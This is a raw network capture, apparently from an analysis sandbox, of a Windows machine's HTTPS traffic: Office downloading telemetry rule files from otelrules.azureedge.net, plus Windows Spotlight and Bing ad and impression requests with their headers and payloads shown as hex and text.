encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.6	49831	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:46 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:46 UTC	471	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:46 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 32118861-501e-0035-506d-49c923000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123146Z-r1cf579d778xq4f9hC1EWRx41g0000000590000000000que x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-12-08 12:31:46 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.6	49832	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:46 UTC	2591	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123143Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ef5c9b82dea54203b104cec805379d04&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-88000045&oemName=pfqgsn%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=pfqgsn20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AASp0AqrsC9r/xwFl+z2y2UsBJJfgRDz+895SPUhgR6pcAWcIIP2oJrW+1j3pNyTqKgRupi9+l1kJ+SvaCNMGWfE3cO1gKXxNKCEWczPo11P7s99D0mu8SGlDRLLPM9Mx0hF41kYjjomrPdDZomjT9UrkuKHyTa2lMdMuGh8DCwVmwaOHHA3EEUvZ0kds4UxJFdn7A28+lzZrl4opVyHpcs6tRluUJlzTmpHAcryi7aGuNd2Lg1eVpOSOGqEeqRw0Rx7XgSH5lttOsQd4lOIs4P1GKZE/GpqSa+tC+5pa1uv0S9Au/bTolRfZjx08hfs8hLfG289zNOES14CScPq2tMgQZgAAEELAwAzTUGUV43IS9cSUt6CwAZ5xTWQmNtlbI5yvrvYJoeDM6i2cwWhkErkXIaLcjq73TIdKjP2imZldo5PjlIxcH7jnWIrBQHB5N6oqBC/AOvAr3B9EckkAGJVnp1U8XuiOsWHmc1Svv3Vlc2+nwnIMfGB8YvtWGXBRm9soCCLXYtGi1QiDpUb6hSuyecduMUfRe3wgWg8RRTaVo9VJ4O2P0SfBiFMI3H8GL+E2SlbVob12epGXjSdveoFPe1EuNabu7NSH/abk/F1XuxAqWqreCrITO1J8F9JyOvi+5dWRtV8XTvAVcCpk/jDsuQy9IjipdZVEXDXgPxwO+TTcNSy5u/mXS/p4R7jtRGA955fu6tfG/o0Ijltx+mmBuT9iaS9kvikqQl8kYh4RIOyu7xDPAX9Rh9nGtOYwbmP4P+KXUI2aglfUThAiyek9mKSls8yNMzbH9frwIClkcwY0P4DRwz0igqszKMwQh8cTjiz5t9qMW2xf6+1Ypf30Y8nWKRSpviHkAzCcPn9jvLMCB2PdZeGEx0Dvh0u4iPjedZl7YVkLln+0417uqBSxq/zPGV+aTWsEPBKVvFTRNGVasjBYhtgB&p= Cache-Control: no-cache MS-CV: HD2UmYvMS0W21TQJ.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-08 12:31:47 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2943 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116216-T1-C128000000001627409+B+P10+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: tWMT83wkr+owSyAgbxMWT29WV1p25kdGonfdhjJVjkTOu4+ii8/0oY4YI3pgRc2suIGVyHJ/4YkzFqxGVQHJlGGwyf2mCCTmZk1ynIRNPfKlas0j/eMxT9UGqXvfcLADgzkonpH/VOLRKgM9RO07gUSXPsIm9VBNJFx6wLcg3LuGggOJy8qE9it2AP0rgv8nMJXgVMA0F6NWXHrnCZqWEaVUwpeE47WRJVFnJa4miCAagJlYowWL0b3q1G714TkDzu00G98FUscmy62W4kDDho5n58PPyymXCGb4p0hq0IEvBqSr63p4np6+kA8KUsTYGNbfuDqIRuBD8Ii7JV/muQ== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sun, 08 Dec 2024 12:31:46 GMT Connection: close
2024-12-08 12:31:47 UTC	2943	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.6	49834	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:46 UTC	831	OUT	GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8rIdI2f7TAgV0fWA4xBNeCTVUCUzRihPMdFqQEB6djcaqoOqla3lmkFADcyin24pa38fROLhpUPuImfZ3LxvNDTrA5u_dkqdDxq-2llIR-5YyITPigvfs6NsrCBI4I1hwzyqbJjcAK4devJxwJch0yHfuLUJgFZLrN1skS1oalKbvLbQ4%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3D4c0619cfda581ab7e0f47e9a4bcc54bd&TIME=20241208T123143Z&CID=531538185&EID=531538185&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: g.bing.com Connection: Keep-Alive
2024-12-08 12:31:47 UTC	862	IN	HTTP/1.1 204 No Content Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Set-Cookie: MUID=0762B76A2A0E624A0D08A2252B7C63F0; domain=.bing.com; expires=Fri, 02-Jan-2026 12:31:47 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: MR=0; domain=g.bing.com; expires=Sun, 15-Dec-2024 12:31:47 GMT; path=/; SameSite=None; Secure; Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 91539949883B4B8FB66A018ECF865249 Ref B: EWR30EDGE0819 Ref C: 2024-12-08T12:31:47Z Date: Sun, 08 Dec 2024 12:31:46 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.6	49833	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:46 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:47 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:47 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 1f17df4b-601e-0050-2d03-482c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123147Z-r1cf579d77867vg8hC1EWR8knc000000053g000000005g9s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:47 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.6	49836	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:47 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:47 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 4c7743ed-001e-0082-4b03-485880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123147Z-r1cf579d778bb9vvhC1EWRs95400000005100000000011cx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:48 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.6	49837	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:48 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:48 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: a374b664-e01e-0051-1f05-4884b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123148Z-r1cf579d778qgtz2hC1EWRmgks000000053g000000004yna x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:48 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.6	49838	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:48 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:48 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 83778e64-b01e-0070-6d05-481cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123148Z-r1cf579d778kr8xrhC1EWRfkun00000005v0000000002hk2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:48 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.6	49839	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:48 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:49 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:48 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: f6e8c48a-401e-000a-8008-484a7b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123148Z-r1cf579d7782ctslhC1EWRfbrw00000005xg000000000zzn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:49 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.6	49841	23.206.197.42	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:49 UTC	444	OUT	GET /aes/c.gif?RG=0a872d6254a34c63961b7276d8885189&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20241208T123144Z&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: www.bing.com Connection: Keep-Alive Cookie: MUID=0762B76A2A0E624A0D08A2252B7C63F0
2024-12-08 12:31:50 UTC	778	IN	HTTP/1.1 200 OK Cache-Control: private,no-store Pragma: no-cache Vary: Origin P3P: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 04D9E379294C438FA24981A8C798EF00 Ref B: DXB251051107040 Ref C: 2024-12-08T12:31:49Z Content-Length: 0 Date: Sun, 08 Dec 2024 12:31:49 GMT Connection: close Set-Cookie: _EDGE_S=SID=13F97BD35778634103906E9C56606285; path=/; httponly; domain=bing.com Set-Cookie: MUIDB=0762B76A2A0E624A0D08A2252B7C63F0; path=/; httponly; expires=Fri, 02-Jan-2026 12:31:49 GMT Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.1dc5ce17.1733661109.91a4c14

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.6	49840	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:49 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:49 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:49 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 8332a10a-c01e-0079-4304-48e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123149Z-r1cf579d778d5zkmhC1EWRk6h800000005sg000000004tr2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:49 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.6	49842	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:49 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
